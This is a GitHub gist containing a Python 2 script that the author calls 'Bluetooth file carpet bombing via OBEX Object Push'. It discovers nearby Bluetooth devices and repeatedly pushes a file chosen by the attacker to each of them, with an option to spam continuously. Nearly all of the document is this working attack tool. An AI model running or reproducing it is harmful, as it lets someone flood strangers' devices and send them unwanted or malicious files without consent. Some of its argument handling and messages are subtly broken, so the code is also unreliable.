Created
May 29, 2016 16:05
-
-
Save mgeeky/5b35453cd46837a01200a0eca4aa1e41 to your computer and use it in GitHub Desktop.
Script intended to flood bluetooth enabled devices with incoming OBEX Object Push requests containing attacker-specified file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Bluetooth scanner with ability to spam devices | |
| # with incoming OBEX Object Push requests containing | |
| # specified file. | |
| # | |
| # Mariusz B. / MGeeky, 16' | |
| # | |
| # Partially based on `Violent Python` snippets. | |
| # Modules required: | |
| # python-bluez | |
| # python-obexftp | |
| # | |
| import bluetooth | |
| import scapy | |
| import obexftp | |
| import sys | |
| import optparse | |
| import threading | |
| import time | |
| import os | |
| foundDevs = [] | |
| def printDev(name, dev, txt='Bluetooth device'): | |
| print '[+] %s: "%s" (MAC: %s)' % (txt, name, dev) | |
| def retBtAddr(addr): | |
| btAddr = str(hex(int(addr.replace(':', ''), 16) + 1))[2:] | |
| btAddr = btAddr[0:2] + ':' + btAddr[2:4] + ':' + btAddr[4:6] + \ | |
| ':' + btAddr[6:8] + ':' + btAddr[8:10] + ':' + btAddr[10:12] | |
| return btAddr | |
| def checkBluetooth(btAddr): | |
| btName = bluetooth.lookup_name(btAddr) | |
| if btName: | |
| printDev('Hidden Bluetooth device detected', btName, btAddr) | |
| return True | |
| return False | |
| def sendFile(dev, filename): | |
| if os.path.exists(filename): | |
| client = obexftp.client(obexftp.BLUETOOTH) | |
| channel = obexftp.browsebt(dev, obexftp.PUSH) | |
| print '[>] Sending file to %s@%s' % (dev, str(channel)) | |
| client.connect(dev, channel) | |
| ret = client.put_file(filename) | |
| if int(ret) >= 1: | |
| print '[>] File has been sent.' | |
| else: | |
| print '[!] File has not been accepted.' | |
| client.disconnect() | |
| else: | |
| print '[!] Specified file: "%s" does not exists.' | |
| def findDevs(opts): | |
| global foundDevs | |
| devList = bluetooth.discover_devices(lookup_names=True) | |
| repeat = range(0, int(opts.repeat)) | |
| for (dev, name) in devList: | |
| if dev not in foundDevs: | |
| name = str(bluetooth.lookup_name(dev)) | |
| printDev(name, dev) | |
| foundDevs.append(dev) | |
| for i in repeat: | |
| sendFile(dev, opts.file) | |
| continue | |
| if opts.spam: | |
| for i in repeat: | |
| sendFile(dev, opts.file) | |
| def main(): | |
| parser = optparse.OptionParser(usage='Usage: %prog [options]') | |
| parser.add_option('-f', '--file', dest='file', metavar='FILE', help='Specifies file to be sent to discovered devices.') | |
| parser.add_option('-t', '--time', dest='time', metavar='TIMEOUT', help='Specifies scanning timeout (default - 0 secs).', default='0') | |
| parser.add_option('-r', '--repeat', dest='repeat', metavar='REPEAT', help='Number of times to repeat file sending after finding a device (default - 1)', default='1') | |
| parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly') | |
| print '\nBluetooth file carpet bombing via OBEX Object Push' | |
| print 'Mariusz B. / MGeeky 16\n' | |
| (opts, args) = parser.parse_args() | |
| if opts.file != '': | |
| if not os.path.exists(opts.file): | |
| print '[!] Specified file: "%s" does not exists.' | |
| sys.exit(0) | |
| print '[+] Started Bluetooth scanning. Ctr-C to stop...' | |
| timeout = float(opts.time) | |
| try: | |
| while True: | |
| findDevs(opts) | |
| time.sleep(timeout) | |
| except KeyboardInterrupt, e: | |
| print '\n[?] User interruption.' | |
| if __name__ == '__main__': | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment